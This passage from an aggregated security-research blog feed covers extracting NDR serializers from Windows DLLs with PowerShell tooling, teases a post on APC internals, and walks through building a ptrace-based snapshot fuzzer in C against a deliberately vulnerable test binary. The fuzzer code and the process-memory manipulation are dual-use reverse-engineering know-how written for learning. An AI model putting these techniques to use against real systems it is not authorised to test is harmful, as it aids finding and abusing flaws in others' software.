  2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
  3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
  4. A list of type offset arrays, these contains the byte offset into the format string (from the Proxy Info structure) for all type serializers.
  5. The index of the type offset in the 4th parameter.
  6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov     [rsp+28h], r14  ; pObject
mov     dword ptr [rsp+20h], 5 ; nTypeIndex
lea     r9, off_1800F3138 ; ArrTypeOffset
lea     r8, stru_1800D5EA0 ; pProxyInfo
lea     rdx, stru_1800DEAF0 ; pPicklingInfo
mov     rcx, [rsp+68h]  ; Handle
call    NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
     -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structured are wrapped inside a Unique Pointers. This is the default when using the real RPC runtime, although except for Conformant Structures isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface no only can you avoid having to work out the offsets as Get-RpcServer will automatically find the location you can also use an additional feature to extract the type information from your private symbols to fixup the type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
    uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
    version(1.0),
]
interface RpcServer
{
    int Test([in] handle_t hBinding, 
             [unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    delete[] p;
}

int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;
}

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost, we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle called to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode2(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_StubDesc,
         ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
         _pType);
}
  1. The serialization handle.
  2. The MIDL_TYPE_PICKLING_INFO structure.
  3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
  4. A pointer into the format string for the start of the type.
  5. A pointer to the structure to serialize or deserialize.
Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's a offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

APC Series: KiUserApcDispatcher and Wow64

28 June 2020 at 00:00
I recommend to read the previous posts before reading this one: User APC API: We discussed the user mode API of user APC User APC Internals: We discussed the implementation of user APC in the kernel Let’s continue our discussion about APC internals in windows: This time we’ll discuss APC dispatching in user mode and how APC works in Wow64 processes: The evolution of KiUserApcDispatcher Modifications to APC functions to support Wow64 Wow64 APC injection techniques The evolution of KiUserApcDispatcher NTDLL contains a set of entry points that the kernel uses to run code in user mode like: KiUserExceptionDispatcher, KiUserCallbackDispatcher, …

Fuzzing Like A Caveman 4: Snapshot/Code Coverage Fuzzer!

By: h0mbre
13 June 2020 at 04:00

Introduction

Last time we blogged, we had a dumb fuzzer that would test an intentionally vulnerable program that would perform some checks on a file and if the input file passed a check, it would progress to the next check, and if the input passed all checks the program would segfault. We discovered the importance of code coverage and how it can help reduce exponentially rare occurences during fuzzing into linearly rare occurences. Let’s get right into how we improved our dumb fuzzer!

Big thanks to @gamozolabs for all of his content that got me hooked on the topic.

Performance

First things first, our dumb fuzzer was slow as hell. If you remember, we were averaging about 1,500 fuzz cases per second with our dumb fuzzer. During my testing, AFL in QEMU mode (simulating not having source code available for compilation instrumentation) was hovering around 1,000 fuzz cases per second. This makes sense, since AFL does way more than our dumb fuzzer, especially in QEMU mode where we are emulating a CPU and providing code coverage.

Our target binary (-> HERE <-) would do the following:

  • extract the bytes from a file on disk into a buffer
  • perform 3 checks on the buffer to see if the indexes that were checked matched hardcoded values
  • segfaulted if all checks were passed, exit if one of the checks failed

Our dumb fuzzer would do the following:

  • extract bytes from a valid jpeg on disk into a byte buffer
  • mutate 2% of the bytes in the buffer by random byte overwriting
  • write the mutated file to disk
  • feed the mutated file to the target binary by executing a fork() and execvp() each fuzzing iteration

As you can see, this is a lot of file system interactions and syscalls. Let’s use strace on our vulnerable binary and see what syscalls the binary makes (for this post, I’ve hardcoded the .jpeg file into the vulnerable binary so that we don’t have to use command line arguments for ease of testing):

execve("/usr/bin/vuln", ["vuln"], 0x7ffe284810a0 /* 52 vars */) = 0
brk(NULL)                               = 0x55664f046000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=88784, ...}) = 0
mmap(NULL, 88784, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f0793d2e000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0793d2c000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f079372c000
mprotect(0x7f0793913000, 2097152, PROT_NONE) = 0
mmap(0x7f0793b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f0793b13000
mmap(0x7f0793b19000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f0793b19000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7f0793d2d500) = 0
mprotect(0x7f0793b13000, 16384, PROT_READ) = 0
mprotect(0x55664dd97000, 4096, PROT_READ) = 0
mprotect(0x7f0793d44000, 4096, PROT_READ) = 0
munmap(0x7f0793d2e000, 88784)           = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL)                               = 0x55664f046000
brk(0x55664f067000)                     = 0x55664f067000
write(1, "[>] Analyzing file: Canon_40D.jp"..., 35[>] Analyzing file: Canon_40D.jpg.
) = 35
openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
lseek(3, 4096, SEEK_SET)                = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 3862) = 3862
lseek(3, 0, SEEK_SET)                   = 0
write(1, "[>] Canon_40D.jpg is 7958 bytes."..., 33[>] Canon_40D.jpg is 7958 bytes.
) = 33
read(3, "\377\330\377\340\0\20JFIF\0\1\1\1\0H\0H\0\0\377\341\t\254Exif\0\0II"..., 4096) = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 4096) = 3862
close(3)                                = 0
write(1, "[>] Check 1 no.: 2626\n", 22[>] Check 1 no.: 2626
) = 22
write(1, "[>] Check 2 no.: 3979\n", 22[>] Check 2 no.: 3979
) = 22
write(1, "[>] Check 3 no.: 5331\n", 22[>] Check 3 no.: 5331
) = 22
write(1, "[>] Check 1 failed.\n", 20[>] Check 1 failed.
)   = 20
write(1, "[>] Char was 00.\n", 17[>] Char was 00.
)      = 17
exit_group(-1)                          = ?
+++ exited with 255 +++

You can see that during the process of the target binary, we run plenty of code before we even open the input file. Looking through the strace output, we don’t even open the input file until we’ve run the following syscalls:

execve
brk
access
access
openat
fstat
mmap
close
access
openat
read
opeant
read
fstat
mmap
mmap
mprotect
mmap
mmap
arch_prctl
mprotect
mprotect
mprotect
munmap
fstat
brk
brk
write

After all of those syscalls, we finally open the file from the disk to read in the bytes with this line from the strace output:

openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3

So keep in mind, we run these syscalls every single fuzz iteration with our dumb fuzzer. Our dumb fuzzer (-> HERE <-) would write a file to disk every iteration, and spawn an instance of the target program with fork() + execvp(). The vulnerable binary would run all of the start up syscalls and finally read in the file from disk every iteration. So thats a couple dozen syscalls and two file system interactions every single fuzzing iteration. No wonder our dumb fuzzer was so slow.

Rudimentary Snapshot Mechanism

I started to think about how we could save time when fuzzing such a simple target binary and thought if I could just figure out how to take a snapshot of the program’s memory after it had already read the file off of disk and had stored the contents in its heap, I could just save that process state and manually insert a new fuzzcase in the place of the bytes that the target had read in and then have the program run until it reaches an exit() call. Once the target hits the exit call, I would rewind the program state to what it was when I captured the snapshot and insert a new fuzz case and then do it all over again.

You can see how this would improve performance. We would skip all of the target binary startup overhead and we would completely bypass all file system interactions. A huge difference would be we would only make one call to fork() which is an expensive syscall. For 100,000 fuzzing iterations let’s say, we’d go from 200,000 filesystem interactions (one for the dumb fuzzer to create a mutated.jpeg on disk, one for the target to read the mutated.jpeg) and 100,000 fork() calls to 0 file system interactions and only the initial fork().

In summary, our fuzzing process should look like this:

  1. Start target binary, but break on first instruction before anything runs
  2. Set breakpoints on a ‘start’ and ‘end’ location (start will be after the program reads in bytes from the file on disk, end will be the address of exit())
  3. Run the program until it hits the ‘start’ breakpoint
  4. Collect all writable memory sections of the process in a buffer
  5. Capture all register states
  6. Insert our fuzzcase into the heap overwriting the bytes that the program read in from file on disk
  7. Resume target binary until it reaches ‘end’ breakpoint
  8. Rewind process state to where it was at ‘start’
  9. Repeat from step 6

We are only doing steps 1-5 only once, so this routine doesn’t need to be very fast. Steps 6-9 are where the fuzzer will spend 99% of its time so we need this to be fast.

Writing a Simple Debugger with Ptrace

In order to implement our snapshot mechanism, we’ll need to use the very intuitive, albeit apparently slow and restrictive, ptrace() interface. When I was getting started writing the debugger portion of the fuzzer a couple weeks ago, I leaned heavily on this blog post by Eli Bendersky which is a great introduction to ptrace() and shows you how to create a simple debugger.

Breakpoints

The debugger portion of our code doesn’t really need much functionality, it really only needs to be able to insert breakpoints and remove breakpoints. The way that you use ptrace() to set and remove breakpoints is to overwrite a single-byte instruction at at an address with the int3 opcode \xCC. However, if you just overwrite the value there while setting a breakpoint, it will be impossible to remove the breakpoint because you won’t know what value was held there originally and so you won’t know what to overwrite \xCC with.

To begin using ptrace(), we spawn a second process with fork().

pid_t child_pid = fork();
if (child_pid == 0) {
    //we're the child process here
    execute_debugee(debugee);
}

Now we need to have the child process volunteer to be ‘traced’ by the parent process. This is done with the PTRACE_TRACEME argument, which we’ll use inside our execute_debugee function:

// request via PTRACE_TRACEME that the parent trace the child
long ptrace_result = ptrace(PTRACE_TRACEME, 0, 0, 0);
if (ptrace_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("ptrace");
    exit(errno);
}

The rest of the function doesn’t involve ptrace but I’ll go ahead and show it here because there is an important function to forcibly disable ASLR in the debuggee process. This is crucial as we’ll be leverage breakpoints at static addresses that cannot change process to process. We disable ASLR by calling personality() with ADDR_NO_RANDOMIZE. Separately, we’ll route stdout and stderr to /dev/null so that we don’t muddy our terminal with the target binary’s output.

// disable ASLR
int personality_result = personality(ADDR_NO_RANDOMIZE);
if (personality_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("personality");
    exit(errno);
}
 
// dup both stdout and stderr and send them to /dev/null
int fd = open("/dev/null", O_WRONLY);
dup2(fd, 1);
dup2(fd, 2);
close(fd);
 
// exec our debugee program, NULL terminated to avoid Sentinel compilation
// warning. this replaces the fork() clone of the parent with the 
// debugee process 
int execl_result = execl(debugee, debugee, NULL);
if (execl_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("execl");
    exit(errno);
}

So first thing’s first, we need a way to grab the one-byte value at an address before we insert our breakpoint. For the fuzzer, I developed a header file and source file I called ptrace_helpers to help ease the development process of using ptrace(). To grab the value, we’ll grab the 64-bit value at the address but only care about the byte all the way to the right. (I’m using the type long long unsigned because that’s how register values are defined in <sys/user.h> and I wanted to keep everything the same).

long long unsigned get_value(pid_t child_pid, long long unsigned address) {
    
    errno = 0;
    long long unsigned value = ptrace(PTRACE_PEEKTEXT, child_pid, (void*)address, 0);
    if (value == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }

    return value;	
}

So this function will use the PTRACE_PEEKTEXT argument to read the value located at address in the child process (child_pid) which is our target. So now that we have this value, we can save it off and insert our breakpoint with the following code:

void set_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    long long unsigned breakpoint = (original_value & 0xFFFFFFFFFFFFFF00 | 0xCC);
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)breakpoint);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

You can see that this function will take our original value that we gathered with the previous function and performs two bitwise operations to keep the first 7 bytes intact but then replace the last byte with \xCC. Notice that we are now using PTRACE_POKETEXT. One of the frustrating features of the ptrace() interface is that we can only read and write 8 bytes at a time!

So now that we can set breakpoints, the last function we need to implement is one to remove breakpoints, which would entail overwriting the int3 with the original byte value.

void revert_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)original_value);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

Again, using PTRACE_POKETEXT, we can overwrite the \xCC with the original byte value. So now we have the ability to set and remove breakpoints.

Lastly, we’ll need a way to resume execution in the debuggee. This can be accomplished by utilizing the PTRACE_CONT argument in ptrace() as follows:

void resume_execution(pid_t child_pid) {

    int ptrace_result = ptrace(PTRACE_CONT, child_pid, 0, 0);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

An important thing to note is, if we hit a breakpoint at address 0x000000000000000, rip will actually be at 0x0000000000000001. So after reverting our overwritten instruction to its previous value, we’ll also need to subtract 1 from rip before resuming execution, we’ll learn how to do this via ptrace in the next section.

Let’s now learn how we can utilize ptrace and the /proc pseudo files to create a snapshot of our target!

Snapshotting with ptrace and /proc

Register States

Another cool feature of ptrace() is the ability to capture and set register states in a debuggee process. We can do both of those things respectively with the helper functions I placed in ptrace_helpers.c:

// retrieve register states
struct user_regs_struct get_regs(pid_t child_pid, struct user_regs_struct registers) {                                                                                                 
    int ptrace_result = ptrace(PTRACE_GETREGS, child_pid, 0, &registers);                                                                              
    if (ptrace_result == -1) {                                                                              
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);                                                                         
        perror("ptrace");                                                                              
        exit(errno);                                                                              
    }

    return registers;                                                                              
}
// set register states
void set_regs(pid_t child_pid, struct user_regs_struct registers) {

    int ptrace_result = ptrace(PTRACE_SETREGS, child_pid, 0, &registers);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

The struct user_regs_struct is defined in <sys/user.h>. You can see we use PTRACE_GETREGS and PTRACE_SETREGS respectively to retrieve register data and set register data. So with these two functions, we’ll be able to create a struct user_regs_struct of snapshot register values when we are sitting at our ‘start’ breakpoint and when we reach our ‘end’ breakpoint, we’ll be able to revert the register states (most imporantly rip) to what they were when snapshotted.

Snapshotting Writable Memory Sections with /proc

Now that we have a way to capture register states, we’ll need a way to capture writable memory states for our snapshot. I did this by interacting with the /proc pseudo files. I used GDB to break on the first function that peforms a check in vuln, importantly this function is after vuln reads the jpeg off disk and will serve as our ‘start’ breakpoint. Once we break here in GDB, we can cat the /proc/$pid/maps file to get a look at how memory is mapped in the process (keep in mind GDB also forces ASLR off using the same method we did in our debugger). We can see the output here grepping for writable sections (ie, sections that could be clobbered during our fuzzcase run):

h0mbre@pwn:~/fuzzing/dragonfly_dir$ cat /proc/12011/maps | grep rw
555555756000-555555757000 rw-p 00002000 08:01 786686                     /home/h0mbre/fuzzing/dragonfly_dir/vuln
555555757000-555555778000 rw-p 00000000 00:00 0                          [heap]
7ffff7dcf000-7ffff7dd1000 rw-p 001eb000 08:01 1055012                    /lib/x86_64-linux-gnu/libc-2.27.so
7ffff7dd1000-7ffff7dd5000 rw-p 00000000 00:00 0 
7ffff7fe0000-7ffff7fe2000 rw-p 00000000 00:00 0 
7ffff7ffd000-7ffff7ffe000 rw-p 00028000 08:01 1054984                    /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]

So that’s seven distinct sections of memory. You’ll notice that the heap is one of the sections. It is important to realize that our fuzzcase will be inserted into the heap, but the address in the heap that stores the fuzzcase will not be the same in our fuzzer as it is in GDB. This is likely due to some sort of environment variable difference between the two debuggers I think. If we look in GDB when we break on check_one() in vuln, we see that rax is a pointer to the beginning of our input, in this case the Canon_40D.jpg.

$rax   : 0x00005555557588b0  →  0x464a1000e0ffd8ff

That pointer, 0x00005555557588b0, is located in the heap. So all I had to do to find out where that pointer was in our debugger/fuzzer, was just break at the same point and use ptrace() to retrieve the rax value.

I would break on check_one and then open /proc/$pid/maps to get the offsets within the program that contain writable memory sections, and then I would open /proc/$pid/mem and read from those offsets into a buffer to store the writable memory. This code was stored in a source file called snapshot.c which contained some definitions and functions to both capture snapshots and restore them. For this part, capturing writable memory, I used the following definitions and function:

unsigned char* create_snapshot(pid_t child_pid) {
 
    struct SNAPSHOT_MEMORY read_memory = {
        {
            // maps_offset
            0x555555756000,
            0x7ffff7dcf000,
            0x7ffff7dd1000,
            0x7ffff7fe0000,
            0x7ffff7ffd000,
            0x7ffff7ffe000,
            0x7ffffffde000
        },
        {
            // snapshot_buf_offset
            0x0,
            0xFFF,
            0x2FFF,
            0x6FFF,
            0x8FFF,
            0x9FFF,
            0xAFFF
        },
        {
            // rdwr length
            0x1000,
            0x2000,
            0x4000,
            0x2000,
            0x1000,
            0x1000,
            0x21000
        }
    };  
 
    unsigned char* snapshot_buf = (unsigned char*)malloc(0x2C000);
 
    // this is just /proc/$pid/mem
    char proc_mem[0x20] = { 0 };
    sprintf(proc_mem, "/proc/%d/mem", child_pid);
 
    // open /proc/$pid/mem for reading
    // hardcoded offsets are from typical /proc/$pid/maps at main()
    int mem_fd = open(proc_mem, O_RDONLY);
    if (mem_fd == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("open");
        exit(errno);
    }
 
    // this loop will:
    //  -- go to an offset within /proc/$pid/mem via lseek()
    //  -- read x-pages of memory from that offset into the snapshot buffer
    //  -- adjust the snapshot buffer offset so nothing is overwritten in it
    int lseek_result, bytes_read;
    for (int i = 0; i < 7; i++) {
        //printf("dragonfly> Reading from offset: %d\n", i+1);
        lseek_result = lseek(mem_fd, read_memory.maps_offset[i], SEEK_SET);
        if (lseek_result == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("lseek");
            exit(errno);
        }
 
        bytes_read = read(mem_fd,
            (unsigned char*)(snapshot_buf + read_memory.snapshot_buf_offset[i]),
            read_memory.rdwr_length[i]);
        if (bytes_read == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("read");
            exit(errno);
        }
    }
 
    close(mem_fd);
    return snapshot_buf;
}

You can see that I hardcoded all the offsets and the lengths of the sections. Keep in mind, this doesn’t need to be fast. We’re only capturing a snapshot once, so it’s ok to interact with the file system. So we’ll loop through these 7 offsets and lengths and write them all into a buffer called snapshot_buf which will be stored in our fuzzer’s heap. So now we have both the register states and the memory states of our process as it begins check_one (our ‘start’ breakpoint).

Let’s now figure out how to restore the snapshot when we reach our ‘end’ breakpoint.

Restoring Snapshot

To restore the process memory state, we could just write to /proc/$pid/mem the same way we read from it; however, this portion needs to be fast since we are doing this every fuzzing iteration now. Iteracting with the file system every fuzzing iteration will slow us down big time. Luckily, since Linux kernel version 3.2, there is support for a much faster, process-to-process, memory reading/writing API that we can leverage called process_vm_writev(). Since this process works directly with another process and doesn’t traverse the kernel and doesn’t involve the file system, it will greatly increase our write speeds.

It’s kind of confusing looking at first but the man page example is really all you need to understand how it works, I’ve opted to just hardcode all of the offsets since this fuzzer is simply a POC. and we can restore the writable memory as follows:

void restore_snapshot(unsigned char* snapshot_buf, pid_t child_pid) {
 
    ssize_t bytes_written = 0;
    // we're writing *from* 7 different offsets within snapshot_buf
    struct iovec local[7];
    // we're writing *to* 7 separate sections of writable memory here
    struct iovec remote[7];
 
    // this struct is the local buffer we want to write from into the 
    // struct that is 'remote' (ie, the child process where we'll overwrite
    // all of the non-heap writable memory sections that we parsed from 
    // proc/$pid/memory)
    local[0].iov_base = snapshot_buf;
    local[0].iov_len = 0x1000;
    local[1].iov_base = (unsigned char*)(snapshot_buf + 0xFFF);
    local[1].iov_len = 0x2000;
    local[2].iov_base = (unsigned char*)(snapshot_buf + 0x2FFF);
    local[2].iov_len = 0x4000;
    local[3].iov_base = (unsigned char*)(snapshot_buf + 0x6FFF);
    local[3].iov_len = 0x2000;
    local[4].iov_base = (unsigned char*)(snapshot_buf + 0x8FFF);
    local[4].iov_len = 0x1000;
    local[5].iov_base = (unsigned char*)(snapshot_buf + 0x9FFF);
    local[5].iov_len = 0x1000;
    local[6].iov_base = (unsigned char*)(snapshot_buf + 0xAFFF);
    local[6].iov_len = 0x21000;
 
    // just hardcoding the base addresses that are writable memory
    // that we gleaned from /proc/pid/maps and their lengths
    remote[0].iov_base = (void*)0x555555756000;
    remote[0].iov_len = 0x1000;
    remote[1].iov_base = (void*)0x7ffff7dcf000;
    remote[1].iov_len = 0x2000;
    remote[2].iov_base = (void*)0x7ffff7dd1000;
    remote[2].iov_len = 0x4000;
    remote[3].iov_base = (void*)0x7ffff7fe0000;
    remote[3].iov_len = 0x2000;
    remote[4].iov_base = (void*)0x7ffff7ffd000;
    remote[4].iov_len = 0x1000;
    remote[5].iov_base = (void*)0x7ffff7ffe000;
    remote[5].iov_len = 0x1000;
    remote[6].iov_base = (void*)0x7ffffffde000;
    remote[6].iov_len = 0x21000;
 
    bytes_written = process_vm_writev(child_pid, local, 7, remote, 7, 0);
    //printf("dragonfly> %ld bytes written\n", bytes_written);
}

So for 7 different writable sections, we’ll write into the debuggee process at the offsets defined in /proc/$pid/maps from our snapshot_buf that has the pristine snapshot data. AND IT WILL BE FAST!

So now that we have the ability to restore the writable memory, we’ll only need to restore the register states now and we’ll be able to complete our rudimentary snapshot mechanism. That is easy using our ptrace_helpers defined functions and you can see the two function calls within the fuzzing loop as follows:

// restore writable memory from /proc/$pid/maps to its state at Start
restore_snapshot(snapshot_buf, child_pid);

// restore registers to their state at Start
set_regs(child_pid, snapshot_registers);

So that’s how our snapshot process works and in my testing, we achieved about a 20-30x speed-up over the dumb fuzzer!

Making our Dumb Fuzzer Smart

At this point, we still have a dumb fuzzer (albeit much faster now). We need to be able to track code coverage. A very simple way to do this would be to place a breakpoint at every ‘basic block’ between check_one and exit so that if we reach new code, a breakpoint will be reached and we can do_something() there.

This is exactly what I did except for simplicity sake, I just placed ‘dynamic’ (code coverage) breakpoints at the entry points to check_two and check_three. When a ‘dynamic’ breakpoint is reached, we save the input that reached the code into an array of char pointers called the ‘corpus’ and we can now start mutating those saved inputs instead of just our ‘prototype’ input of Canon_40D.jpg.

So our code coverage feedback mechanism will work like this:

  1. Mutate prototype input and insert the fuzzcase into the heap
  2. Resume debuggee
  3. If ‘dynamic breakpoint’ reached, save input into corpus
  4. If corpus > 0, randomly pick an input from the corpus or the prototype and repeat from step 1

We also have to remove the dynamic breakpoint so that we stop breaking on it. Good thing we already know how to do this well!

As you may remember from the last post, code coverage is crucial to our ability to crash this test binary vuln as it performs 3 byte comparisons that all must pass before it crashes. We determined mathematically last post that our chances of passing the first check is about 1 in 13 thousand and our chances of passing the first two checks is about 1 in 170 million. Because we’re saving input off that passes check_one and mutating it further, we can reduce the probability of passing check_two down to something close to the 1 in 13 thousand figure. This also applies to inputs that then pass check_two and we can therefore reach and pass check_three with ease.

Running The Fuzzer

The first stage of our fuzzer, which collects snapshot data and sets ‘dynamic breakpoints’ for code coverage, completes very quickly even though its not meant to be fast. This is because all the values are hardcoded since our target is extremely simple. In a complex multi-threaded target we would need some way to script the discovery of dynamic breakpoint addresses via Ghidra or objdump or something and we’d need to have that script write a configuration file for our fuzzer, but that’s far off. For now, for a POC, this works fine.

h0mbre@pwn:~/fuzzing/dragonfly_dir$ ./dragonfly 

dragonfly> debuggee pid: 12156
dragonfly> setting 'start/end' breakpoints:

   start-> 0x555555554b41
   end  -> 0x5555555548c0

dragonfly> set dynamic breakpoints: 

           0x555555554b7d
           0x555555554bb9

dragonfly> collecting snapshot data
dragonfly> snapshot collection complete
dragonfly> press any key to start fuzzing!

You can see that the fuzzer helpfully displays the ‘start’ and ‘end’ breakpoints as well as lists the ‘dynamic breakpoints’ for us so that we can check to see that they are correct before fuzzing. The fuzzer pauses and waits for us to press any key to start fuzzing. We can also see that the snapshot data collection has completed successfully so now we are broken on ‘start’ and have all the data we need to start fuzzing.

Once we press enter, we get a statistics output that shows us how the fuzzing is going:

dragonfly> stats (target:vuln, pid:12156)

fc/s       : 41720
crashes    : 5
iterations : 0.3m
coverage   : 2/2 (%100.00)

As you can see, it found both ‘dynamic breakpoints’ almost instantly and is currently running about 41k fuzzing iterations per second of CPU time (about 20-30x faster in wall time than our dumb fuzzer).

Most importantly, you can see that we were able to crash the binary 5 times already in just 300k iterations! We could’ve never done this with our previous fuzzer.

vv CLICK THIS TO WATCH IT IN ACTION vv

asciicast

Conclusion

